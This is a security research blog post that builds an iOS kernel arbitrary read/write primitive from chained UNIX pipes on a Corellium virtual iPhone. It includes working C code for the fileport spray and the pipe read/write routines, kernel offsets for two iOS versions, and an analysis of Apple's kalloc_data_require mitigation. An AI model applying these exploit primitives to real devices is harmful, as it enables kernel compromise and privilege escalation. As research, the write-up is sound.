Exploring UNIX pipes for iOS kernel exploit primitives, and introducing kalloc_data_require
Disclaimer: All technical explanations are to the best of my knowledge and subject to human fallibility. Concepts may be overly simplified intentionally or otherwise.
While playing with Corellium to practice developing exploits with previously-patched bugs, I started to think about how Corellium's hypervisor magic could be used to practice on generalized techniques even without an underlying vulnerability. A particular paragraph by Brandon Azad inspired the concept:
"Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately."
In the browser world, a typical exploit strategy would take two ArrayBuffer
objects and point the backing store pointer from one at the other, such that arrayBuffer1
can change arrayBuffer2->backing_store_pointer
arbitrarily and safely, such as in this example from my Tesla Browser exploit:
The important part of the above diagram is the green box, corresponding to arrayBuffer1
, and its backing store pointer containing the address of arrayBuffer2
(the standalone gray box on the right). By indexing into arrayBuffer1
, fields within arrayBuffer2
can be modified, especially arrayBuffer2->backing_store_pointer
.
Indexing into arrayBuffer2
will now read/write the desired arbitrary address.
The iOS kernel, having a BSD component, contains an obvious equivalent: UNIX pipes. The pipe APIs are used much like files in typical UNIX fashion, but rather than being backed by a file on disk, their contents are stored in the kernel's address space in the form of a "pipe buffer" which is a separate allocation (by default 512 bytes, but can be expanded by writing more data to the pipe). Controlling the pipe buffer pointer creates arbitrary read/write primitives in the same way as controlling an ArrayBuffer
's backing store pointer in a Javascript engine.
For example, this snippet will create a pipe, which is represented as a pair of file descriptors (one "read end" and one "write end"), and then write 32 bytes of A
:
int pipe_pairs[2] = {0};
if (pipe(pipe_pairs)) {
fprintf(stderr, "[!] Failed to create pipe: %s\n", strerror(errno));
exit(-1);
}
printf("Pipe read end fd: %d\n", pipe_pairs[0]);
printf("Pipe write end fd: %d\n", pipe_pairs[1]);
char pipe_buf_contents[32];
memset(pipe_buf_contents, 0x41, sizeof(pipe_buf_contents));
write(pipe_pairs[1], &pipe_buf_contents, sizeof(pipe_buf_contents));
char buf[33] = {0};
read(pipe_pairs[0], &buf, 32);
printf("Read from pipe: %s\n", buf);
This creates at least two kernel allocations: A struct pipe
and the pipe buffer itself. To build out the technique, we first need a simulated vulnerabilty.
Corellium is Magic
Corellium has a very neat feature that allows userland code to arbitrarily read/write kernel memory. While this will be perfectly reliable, for the sake of argument we'll pretend that there's a chance of failure leading a kernel panic. Thus, the whole point of the pipe technique is to "promote" from unreliable primitives to better primitives. Our example primitives will be an arbitrary read of 0x20
bytes (randomly chosen) and arbitrary 64-bit write^1:
/* Simulate a 0x20 byte read from an arbitrary kernel address, representative of a primitive from a bug.
* Caller is responsible for freeing the buffer.
*/
static char *corellium_read(uint64_t kaddr_to_read) {
char *leak = calloc(1, 128);
unicopy(UNICOPY_DST_USER|UNICOPY_SRC_KERN, (uintptr_t)leak, kaddr_to_read, 0x20);
return leak;
}
/* Simulate a 64-bit arbitrary write */
static void corellium_write64(uintptr_t kaddr, uint64_t val) {
uint64_t value = val;
unicopy(UNICOPY_DST_KERN|UNICOPY_SRC_USER, kaddr, (uintptr_t)&value, sizeof(value));
}
For additional realism we could add a random chance of failure, for example 10% chance of causing a kernel panic for each usage, or increasing the probability of failure each time. For the purpose of building out the technique I decided to keep it at 100% reliable, however.
Importantly, these primitives don't provide a KASLR^2 leak, so part of the development process will be working around that weakness. Corellium does have another magic hvc
call that gives the kernel base address, but I chose not to use it.
Building up the pipe primitives
To start, we need two pipes, with allocated buffers. This is very similar to the basic pipe example above:
// Create two pipes
int pipe_pairs[4] = {0};
for (int i = 0; i < 4; i += 2) {
if (pipe(&pipe_pairs[i])) {
fprintf(stderr, "[!] Failed to create pipe: %s\n", strerror(errno));
exit(-1);
}
}
char pipe_buf_contents[64];
memset(pipe_buf_contents, 0x41, sizeof(pipe_buf_contents));
write(pipe_pairs[1], &pipe_buf_contents, sizeof(pipe_buf_contents));
memset(pipe_buf_contents, 0x42, sizeof(pipe_buf_contents));
write(pipe_pairs[3], &pipe_buf_contents, sizeof(pipe_buf_contents));
Now we need to locate these structures in kernel memory. One approach would be to use the arbitrary read to walk the struct proc
linked list to find the exploit process, then walk its p_fd->fd_ofiles
array to find the pipe's fileglob
, and finally read fileglob->fg_data
, which will be a struct pipe
. Unfortunately, that requires many reads, and we're pretending that the read primitive is unreliable. It also requires knowing the KASLR slide in order to find the head of the struct proc
list. We need a different approach.
Fileports: The Reese's Peanut Butter Cup of XNU
There's an API for sharing a UNIX file descriptor via Mach ports, and spraying Mach ports has been a common technique for quite some time. The fileport creation API is very simple:
int pipe_read_fd = [...]; // Assume this was created elsewhere
mach_port_t my_fileport = MACH_PORT_NULL;
kern_return_t kr = fileport_makeport(pipe_read_fd, &my_fileport);
By making a huge number of these (say, 100k), the odds of one of the Mach ports landing at a predictable address are quite high. The port's kobject
field points to the pipe's fileglob
object. This contains two very useful fields:
fg_ops
: a pointer to an array of function pointers. This is how the kernel knows to callpipe_read
rather thanvn_read
(used for regular files on disk). This pointer is within the kernel's__DATA_CONST
section, which means that it's a KASLR leak!fg_data
: a pointer to thestruct pipe
, which is what we wanted in the first place.
The struct pipe
then contains an embedded structure (struct pipebuf) which holds the address of the pipe buffer^3. With two uses of the arbitrary read, we can identify the address of a struct pipe
. For our purposes, we have to do it again to locate pipe2
, so a total of four uses of the arbitrary read. But how do we figure out which kernel address to guess?
More Corellium magic: Hypervisor Hooks
Rather than wildly guessing, we can use hypervisor hooks to output the address of each fileport allocation, and then pick one that shows up in multiple runs.
The hooks are placed via a debugger command, but run independently of the debugger after that. Consequently, they run much faster than breakpoints, and can log directly to the device's virtual console, which will make it easy to extract the data for later analysis.
Our hook will be about as trivial as possible: Simply print the value of a register when a particular address is executed. This is performed with a limited C-like syntax in the form of a one-liner:
(lldb) process plugin packet monitor patch 0xFFFFFFF00756F4F8 print_int("Fileport allocated", cpu.x[0]); print("\n");
process plugin packet monitor
is lldb's overly verbose syntax for sending raw "monitor" commands^4 to the remote debugger stub. The hooks documentation says that these commands are "generally not available" with lldb, but at least this basic hook seems to work.
The rest of the command hooks the desired address and prints the contents of the X0
register to the device's console. Fortunately, the output of hooks are displayed in a different text color, so it's easy to spot.
To prepare the hook, we need to identify an address to patch where the address of the new allocation will be in a register. Looking at the implementation of fileport_makeport
:
int
sys_fileport_makeport(proc_t p, struct fileport_makeport_args *uap, __unused int *retval)
{
int err;
int fd = uap->fd; // [1]
user_addr_t user_portaddr = uap->portnamep;
struct fileproc *fp = FILEPROC_NULL;
struct fileglob *fg = NULL;
ipc_port_t fileport;
mach_port_name_t name = MACH_PORT_NULL;
[...]
err = fp_lookup(p, fd, &fp, 1); // [2]
if (err != 0) {
goto out_unlock;
}
fg = fp->fp_glob; // [3]
if (!fg_sendable(fg)) {
err = EINVAL;
goto out_unlock;
}
[...]
/* Allocate and initialize a port */
fileport = fileport_alloc(fg); // [4]
if (fileport == IPC_PORT_NULL) {
fg_drop_live(fg);
err = EAGAIN;
goto out;
}
[...]
}
At mark #1, the file descriptor is received from the arguments structure, and will match the same integer representation of the pipe's fd as seen in userspace.
Mark #2 performs the translation of the fd (e.g. 3) to a pointer to the fileproc
object representing the pipe in the kernel's memory. Then at mark #3, the fp_glob
pointer is dereferenced, retrieving the fileglob
for the pipe.
Mark #4 creates the Mach port, which wraps the fileglob
object, placing its pointer in the kobject
field. fileport
is the address we want to log, and it's the return value from fileport_alloc
, so it'll be in the X0
register. Let's take a look at fileport_alloc:
ipc_port_t
fileport_alloc(struct fileglob *fg)
{
return ipc_kobject_alloc_port((ipc_kobject_t)fg, IKOT_FILEPORT,
IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST);
}
This function is short and only referenced once, so it'll likely be inlined. Now that we know the lay of the land, we need to find the equivalent code inside the kernelcache. Fortunately, jtool2 can help with that. After downloading the kernelcache from the Corellium web interface's "Connect" tab, jtool2
's analyze feature can be used to create a symbol cache file:
$ jtool2 --analyze kernel-iPhone9,1-18F72
Analyzing kernelcache..
This is an old-style A10 kernelcache (Darwin Kernel Version 20.5.0: Sat May 8 02:21:50 PDT 2021; root:xnu-7195.122.1~4/RELEASE_ARM64_T8010)
Warning: This version of joker supports up to Darwin Version 19 - and reported version is 20
-- Processing __TEXT_EXEC.__text..
Disassembling 6655836 bytes from address 0xfffffff007154000 (offset 0x15001c):
__ZN11OSMetaClassC2EPKcPKS_j is 0xfffffff0076902f8 (OSMetaClass)
Can't get IOKit Object @0x0 (0xfffffff007690b5c)
[...]
opened companion file ./kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB
Dumping symbol cache to file
Symbolicated 7298 symbols and 9657 functions
And then that file can be grepped to find the two symbols we need:
$ grep ipc_kobject_alloc_port kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB
0xfffffff00719de7c|_ipc_kobject_alloc_port|
$ grep fileport_makeport kernel-iPhone9,1-18F72.ARM64.B2ACCB63-D29B-34B0-8C57-799C70810BDB
0xfffffff00756f3a4|_fileport_makeport|
Now we simply locate the call to ipc_kobject_alloc_port
from within fileport_makeport
:
The instruction after the call is the one to hook, so 0xFFFFFFF00756F4F8
(unslid). Since KASLR is enabled, patching this address directly won't work^5. Fortunately, as previously mentioned there's yet another bit of hypervisor magic: a way to obtain the slid kernel base from userspace by calling their provided get_kernel_addr
function:
#define KERNEL_BASE 0xFFFFFFF007004000
uint64_t kslide = get_kernel_addr(0) - KERNEL_BASE;
printf("Kernel slide: 0x%llx\n", kslide);
printf("Place hypervisor hook:\n");
uint64_t patch_address = g_kparams->fileport_allocation_kaddr+kslide;
printf("\tprocess plugin packet monitor patch 0x%llx print_int(\"Fileport allocated\", cpu.x[0]); print(\"\\n\");\n", patch_address);
printf("Press enter to continue\n");
getchar();
By placing this snippet at the beginning of the exploit, it provides a moment to get the debugger attached and install the hook, providing the correct slid address for the given kernelcache.
Once the hook is in place, we perform the spray of 100k fileports and select an allocation to use as the guess going forward. I simply scrolled up a bit and picked one at random about 3/4 of the way down the list, and that seems to work well enough for a proof of concept. A more serious implementation would track ranges over multiple runs and try to pick an address with a known high probabilty of landing the spray, such as in Justin Sherman's IOMobileFrameBuffer exploit.
Now that we have a guess, we can perform the same spray twice (once per pipe read-end fd) and read the kobject
field to locate the struct pipe
. Here's the full implementation:
struct kpipe {
int rfd;
int wfd;
uint64_t fg_ops;
uint64_t r_fg_data;
};
static struct kpipe *find_pipe(int rfd, int wfd) {
struct kpipe *kp = NULL;
char *leak = NULL;
char *fileglob = NULL;
char *fg_data = NULL;
printf("[*] Spraying fileports\n");
mach_port_t fileports[NUM_FILEPORTS] = {0};
for (int i = 0; i < NUM_FILEPORTS; i++) {
kern_return_t kr = fileport_makeport(rfd, &fileports[i]);
CHECK_KR(kr);
}
printf("[*] Done spraying fileports\n");
#ifdef SAMPLE_MEMORY
// No need to continue, just exit
printf("[*] Finished creating memory sample, exiting\n");
exit(0);
#endif
uint64_t kaddr_to_read = g_kparams->fileport_kaddr_guess;
leak = read_kernel_data(kaddr_to_read+g_kparams->kobject_offset); // port->kobject, should point to a struct fileglob
if (!leak) {
printf("[!] Failed to read kernel data, will likely panic soon\n");
goto out;
}
uint64_t pipe_fileglob_kaddr = *(uint64_t *)leak;
if ((pipe_fileglob_kaddr & 0xff00000000000000) != 0xff00000000000000) {
printf("[!] Failed to land the fileport spray\n");
goto out;
}
pipe_fileglob_kaddr |= 0xffffff8000000000; // Pointer might be PAC'd
printf("[*] Found pipe structure: 0x%llx\n", pipe_fileglob_kaddr);
// +0x28 points to fg_ops to leak the KASLR slide
// +0x38 points to fg_data (struct pipe)
fileglob = read_kernel_data(pipe_fileglob_kaddr+0x28);
if (!fileglob) {
printf("[!] Failed to read kernel data, will likely panic soon\n");
goto out;
}
kp = calloc(1, sizeof(struct kpipe));
kp->rfd = rfd;
kp->wfd = wfd;
kp->fg_ops = *(uint64_t *)fileglob;
kp->r_fg_data = *(uint64_t *)(fileglob+0x10);
printf("[*] pipe fg_ops: 0x%llx\n", kp->fg_ops);
printf("[*] pipe r_fg_data: 0x%llx\n", kp->r_fg_data);
out:
for (int i = 0; i < NUM_FILEPORTS; i++) {
kern_return_t kr = mach_port_destroy(mach_task_self(), fileports[i]);
CHECK_KR(kr);
}
#define FREE(m) free(m); m = NULL;
FREE(leak);
FREE(fileglob);
FREE(fg_data);
#undef FREE
return kp;
}
Plumbing the pipes together
Now that we know where our pipes are, we can simply write a single 64-bit value and have a reliable method of arbitrary read/write! struct pipe
contains an embedded structure, struct pipebuf
, which contains all of the fields we care about:
struct pipebuf {
u_int cnt; /* number of chars currently in buffer */
u_int in; /* in pointer */
u_int out; /* out pointer */
u_int size; /* size of buffer */
#if KERNEL
caddr_t OS_PTRAUTH_SIGNED_PTR("pipe.buffer") buffer; /* kva of buffer */
#else
caddr_t buffer; /* kva of buffer */
#endif /* KERNEL */
};
The in
and out
fields are used as cursors to keep track of the current offsets for write and read operations on a pipebuf, and the buffer
field points to the kernel memory containing the pipe's data. The next step is very simple, just set pipe1
's buffer address (offset +0x10
from the struct pipe
) to the address of pipe2
's struct proc
:
ctx->pipe1 = find_pipe(pipe_pairs[0], pipe_pairs[1]);
[...]
ctx->pipe2 = find_pipe(pipe_pairs[2], pipe_pairs[3]);
[...]
// Set pipe1's buffer to point to pipe2's fg_data
printf("[*] Setting pipe1->buffer (0x%llx) to pipe2's fg_data (0x%llx)...\n", (ctx->pipe1->r_fg_data+0x10), ctx->pipe2->r_fg_data);
kwrite64(ctx->pipe1->r_fg_data+0x10, ctx->pipe2->r_fg_data);
And now by reading from and writing to pipe1
, we can control the buffer pointer and in
/out
fields of pipe2
reliably and safely:
int pipe_kread(uint64_t kaddr, void *buf, size_t len) {
assert(g_pipe_rw_ctx);
struct pipe_rw_context *ctx = g_pipe_rw_ctx;
read(ctx->pipe1->rfd, &ctx->prw, sizeof(ctx->prw));
ctx->prw.cnt = len;
ctx->prw.size = len;
ctx->prw.buffer = kaddr;
ctx->prw.in = 0;
ctx->prw.out = 0;
write(ctx->pipe1->wfd, &ctx->prw, sizeof(ctx->prw));
return read(ctx->pipe2->rfd, buf, len);
}
Where prw
is a structure matching the layout of struct pipebuf
:
struct pipe_rw {
u_int cnt;
u_int in;
u_int out;
u_int size;
uint64_t buffer;
};
And then the write primitive works similarly:
int pipe_kwrite(uint64_t kaddr, void *buf, size_t len) {
assert(g_pipe_rw_ctx);
struct pipe_rw_context *ctx = g_pipe_rw_ctx;
read(ctx->pipe1->rfd, &ctx->prw, sizeof(ctx->prw));
if (len < 0x200) {
ctx->prw.size = 0x200; // Original value, this works, but what if we write more than 0x200 bytes?
} else if (len < 0x4000) {
ctx->prw.size = 0x4000;
} else {
errx(EXIT_FAILURE, "[!] Writes of size >=0x4000 are not supported!\n");
}
ctx->prw.cnt = len;
ctx->prw.buffer = kaddr;
ctx->prw.in = 0;
ctx->prw.out = 0;
write(ctx->pipe1->wfd, &ctx->prw, sizeof(ctx->prw));
return write(ctx->pipe2->wfd, buf, len);
}
Now that the new primitives are set up, we can test them out by reading and writing some known values, for example the version string^6 and a sysctl that has been used in the past for flagging previous exploitation:
// Example of arbitrary read
printf("[*] Beginning arbitrary read of kernel version string...\n");
char version[128] = {0};
pipe_kread(g_kparams->version_string_kaddr+g_pipe_rw_ctx->kslide, &version, sizeof(version));
hexdump(version, sizeof(version));
// Example of arbitrary write
printf("[*] Beginning arbitrary write of kern.maxfilesperproc...\n");
pipe_kwrite32(g_kparams->maxfilesperproc_kaddr+g_pipe_rw_ctx->kslide, 0x41414141);
int maxfilesperproc = 0;
size_t sysctl_size = sizeof(int);
if (sysctlbyname("kern.maxfilesperproc", &maxfilesperproc, &sysctl_size, NULL, 0)) {
errx(EXIT_FAILURE, "sysctlbyname: %s\n", strerror(errno));
}
printf("[*] kern.maxfilesperproc: %d (0x%x)\n", maxfilesperproc, maxfilesperproc);
Putting it all together and running the exploit looks like this:
sh-5.0# /tmp/pipe_rw
[*] Detected iPhone9,1/18F72 (14.6)
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe19bcc3540
[*] pipe fg_ops: 0xfffffff00acd9640
[*] pipe r_fg_data: 0xffffffe19bc3c9e8
[*] KASLR slide: 0x3bac000
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe19d0eb7e0
[*] pipe fg_ops: 0xfffffff00acd9640
[*] pipe r_fg_data: 0xffffffe19bc3cb50
[*] Setting pipe1->buffer (0xffffffe19bc3c9f8) to pipe2's fg_data (0xffffffe19bc3cb50)...
[*] Beginning arbitrary read of kernel version string...
0x000000: 44 61 72 77 69 6e 20 4b 65 72 6e 65 6c 20 56 65 Darwin Kernel Ve
0x000010: 72 73 69 6f 6e 20 32 30 2e 35 2e 30 3a 20 53 61 rsion 20.5.0: Sa
0x000020: 74 20 4d 61 79 20 20 38 20 30 32 3a 32 31 3a 35 t May 8 02:21:5
0x000030: 30 20 50 44 54 20 32 30 32 31 3b 20 72 6f 6f 74 0 PDT 2021; root
0x000040: 3a 78 6e 75 2d 37 31 39 35 2e 31 32 32 2e 31 7e :xnu-7195.122.1~
0x000050: 34 2f 52 45 4c 45 41 53 45 5f 41 52 4d 36 34 5f 4/RELEASE_ARM64_
0x000060: 54 38 30 31 30 00 00 00 00 14 00 00 00 05 00 00 T8010...........
0x000070: 00 00 00 00 00 80 00 00 00 00 00 00 00 30 00 72 .............0.r
[*] Beginning arbitrary write of kern.maxfilesperproc...
[*] kern.maxfilesperproc: 1094795585 (0x41414141)
Done, entering infinite loop, will panic on termination
Note that when the pipe file descriptors are closed (which happens automatically when the process terminates), the kernel will panic. This is because it will try to free the pipe buffer, which for pipe2
will point to wherever was last read/written, and for pipe1
will point to pipe2
. This creates a chicken-and-egg scenario, as the pipes can't be used to fix themselves up before being closed. For testing purposes, I opted to simply hang forever.
At this point a full proof-of-concept would go through the standard procedure of escalating privileges and unsandboxing.
Testing on iOS 15.1
We'd like the technique to be generalized and work on newer versions of iOS as well, so the next step is to create a virtual iPhone 7 with iOS 15.1 and find the parts that are different. Of course static kernel addresses like the fg_ops
field on a pipe and the kernel version string will be different, and likely the guessed kernel address for the spray will change. After performing the same steps of examining the kernelcache and sampling the fileports spray, here are the two sets of parameters together, first from iOS 14.6 and then from 15.1 (both on iPhone 7):
static struct kernel_params iPhone7_18F72 = {
.kobject_offset = 0x68,
.pipe_ops_kaddr = 0xfffffff00712d640,
.version_string_kaddr = 0xFFFFFFF00703BB17,
.maxfilesperproc_kaddr = 0xfffffff0077d07f0,
.fileport_kaddr_guess = 0xffffffe19debc540,
.fileport_allocation_kaddr = 0xFFFFFFF00756F4F8,
};
static struct kernel_params iPhone7_19B74 = {
.kobject_offset = 0x58,
.pipe_ops_kaddr = 0xFFFFFFF007143AC8,
.version_string_kaddr = 0xFFFFFFF00703BCBE,
.maxfilesperproc_kaddr = 0xFFFFFFF007834AE8,
.fileport_kaddr_guess = 0xffffffe0f7678820,
.fileport_allocation_kaddr = 0xFFFFFFF0075A8EF4,
};
The only unexpected change was the kobject
offset within the Mach port object. In theory, with all of this filled in the technique should "just work."
Well, almost:
sh-5.0# /tmp/pipe_rw
[*] Detected iPhone9,1/19B74 (15.1)
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe0f6b7c600
[*] pipe fg_ops: 0xfffffff01a677ac8
[*] pipe r_fg_data: 0xffffffe0f46b09e8
[*] KASLR slide: 0x13534000
[*] Spraying fileports
[*] Done spraying fileports
[*] Found pipe structure: 0xffffffe0f6b7c720
[*] pipe fg_ops: 0xfffffff01a677ac8
[*] pipe r_fg_data: 0xffffffe0f46b0b50
[*] Setting pipe1->buffer (0xffffffe0f46b09f8) to pipe2's fg_data (0xffffffe0f46b0b50)...
[*] Beginning arbitrary read of kernel version string...
[...]
panic(cpu 0 caller 0xfffffff01ad357c4): kalloc_data_require failed: address 0xffffffe0f46b0b50 in [pipe zone] @kalloc.c:1776
[...]
This appears to be a new, albeit small mitigation specifically designed to counter this technique!
Opening up the kernelcache in a disassembler and finding the panic call by cross-referencing the string, it appears that this is only used within pipe_read
and pipe_write
. This appears to be conceptually similar to zone_require
, integrating an element of kheaps
. Essentially, pipe buffers under normal circumstances should only contain "data", or blobs that have no particular meaning to the kernel.
The decompilation is relatively straightforward (although not entirely accurate, but it's sufficient for a high-level understanding): looking up the relevant page in the zone metadata and checking a flag that indicates whether the allocation is from a KHEAP_DATA_BUFFERS
zone.
void __fastcall kalloc_data_require(unsigned __int64 kaddr, unsigned __int64 size)
{
__int64 zone_index; // x8
unsigned __int16 *v3; // x8
if ( kaddr + size
|| (zone_index = *(_WORD *)(16LL * (unsigned int)(kaddr >> 14)) & 0x7FF, (zone_security_array[zone_index] & 6) != 4)
|| ((_DWORD)zone_index != 3 ? (v3 = (unsigned __int16 *)&qword_FFFFFFF0078510A8[21 * zone_index + 6] + 3) : (v3 = (unsigned __int16 *)&unk_FFFFFFF0070FE812),
*v3 < size) )
{
kalloc_data_require_panic(kaddr, size);
}
}
void __fastcall __noreturn kalloc_data_require_panic(unsigned __int64 kaddr, __int64 size)
{
__int64 zone_index; // x8
const char *v3; // x9
const char *v4; // x10
unsigned __int16 *zone_allocation_size; // x8
if ( kaddr + size )
panic(
"kalloc_data_require failed: address %p not in zone native map @%s:%d",
(const void *)kaddr,
"kalloc.c",
1785LL);
zone_index = *(_WORD *)(16LL * (unsigned int)(kaddr >> 14)) & 0x7FF;
if ( (unsigned int)zone_index < 0x28A )
{
v3 = (const char *)*((_QWORD *)&off_FFFFFFF0070FAD38
+ (((unsigned __int64)(unsigned __int8)zone_security_array[zone_index] >> 1) & 3));
v4 = (const char *)qword_FFFFFFF0078510A8[21 * zone_index + 2];
if ( (zone_security_array[zone_index] & 6) == 4 )
{
if ( (_DWORD)zone_index == 3 )
zone_allocation_size = (unsigned __int16 *)&unk_FFFFFFF0070FE812;
else
zone_allocation_size = (unsigned __int16 *)&qword_FFFFFFF0078510A8[21 * zone_index + 6] + 3;
panic(
"kalloc_data_require failed: address %p in [%s%s], size too large %zd > %zd @%s:%d",
(const void *)kaddr,
v3,
v4,
size,
*zone_allocation_size,
"kalloc.c",
1782LL);
}
panic("kalloc_data_require failed: address %p in [%s%s] @%s:%d", (const void *)kaddr, v3, v4, "kalloc.c", 1776LL);
}
panic_zone_is_outside_zone_array(&qword_FFFFFFF0078510A8[21 * zone_index]);
}
For more accuracy, here's the disassembly^7 with some notes:
In earlier versions of XNU, pipe buffers would be allocated by kalloc
:
static int
pipespace(struct pipe *cpipe, int size)
{
vm_offset_t buffer;
if (size <= 0) {
return EINVAL;
}
if ((buffer = (vm_offset_t)kalloc(size)) == 0) {
return ENOMEM;
}
/* free old resources if we're resizing */
pipe_free_kmem(cpipe);
cpipe->pipe_buffer.buffer = (caddr_t)buffer;
cpipe->pipe_buffer.size = size;
cpipe->pipe_buffer.in = 0;
cpipe->pipe_buffer.out = 0;
cpipe->pipe_buffer.cnt = 0;
OSAddAtomic(1, &amountpipes);
OSAddAtomic(cpipe->pipe_buffer.size, &amountpipekva);
return 0;
}
This would result in an allocation in one of the kalloc
zones rounded up from the size of the initial write. In iOS 14.x, this changed to allocating from the KHEAP_DATA_BUFFERS
submap:
static int
pipespace(struct pipe *cpipe, int size)
{
[...]
buffer = (vm_offset_t)kheap_alloc(KHEAP_DATA_BUFFERS, size, Z_WAITOK);
if (!buffer) {
return ENOMEM;
}
[...]
}
By itself, this only prevents pipe buffers from being used to build fake objects (e.g. as the replacer object for use-after-free), because most interesting objects would be allocated from the KHEAP_DEFAULT
/KHEAP_KEXT
submaps, or from a dedicated zone.
This new call to kalloc_data_require
expands on this to enforce that the pipe buffer must be allocated from KHEAP_DATA_BUFFERS
. This breaks the technique of pointing one pipe at another because the dedicated pipe zone is definitely not in KHEAP_DATA_BUFFERS
.
At the time of this writing, there are zero Google results for kalloc_data_require
(Update: The source code is now available!), which indicates that perhaps this pipe technique isn't particularly relevant anymore (especially having been already affected by data PAC). It's possible that changing a pipe buffer pointer to some other type of KHEAP_DATA_BUFFERS
object could pan out, but that's an open research question. If such an object exists then it likely doesn't belong in KHEAP_DATA_BUFFERS
and that itself could be considered a vulnerability.
This new mini-mitigation was a fun discovery, and shows Apple's strategy of hardening to break techniques as a form of defense-in-depth. Looking through Brandon Azad's excellent survey of public iOS kernel exploits, many of them use pipe buffers either as "replacer" objects in a use-after-free scenario or placed after another type of object and used as the target object of an overflow. Since those involve keeping the pipe buffer pointer untouched (i.e. pointing at a legitimate pipe buffer allocation), this mitigation wouldn't affect those techniques. Perhaps Apple has seen the technique used in the wild, or they've simply identified it as a fairly obvious technique and decided to eliminate it preemptively.
The full source code is available on Github.
- Are these realistic primitives? Perhaps not, but the purpose here is to practice on a technique, so the underlying bug (real or otherwise) is less important.
- Corellium devices by default have KASLR disabled. Be sure to edit the settings before booting.
- The buffer pointer is now subject to data PAC, which unfortunately breaks the technique on A12+. The rest of this post is focused on pre-PAC devices.
- There are a bunch of other cool monitor commands exposed by Corellium, run process plugin packet monitor help for a list!
- Perhaps Corellium will add a way to hook kernel_base+offset in the future which would make this much easier.
- Neither of these are great examples for real exploitation since there are other ways to read the version string, and the kern.maxfilesperproc sysctl is both readable and writable from userspace, but they demonstrate the point.
- IDA Pro had some bizarre disassembly issues with this function, but Binary Ninja handled it quite well.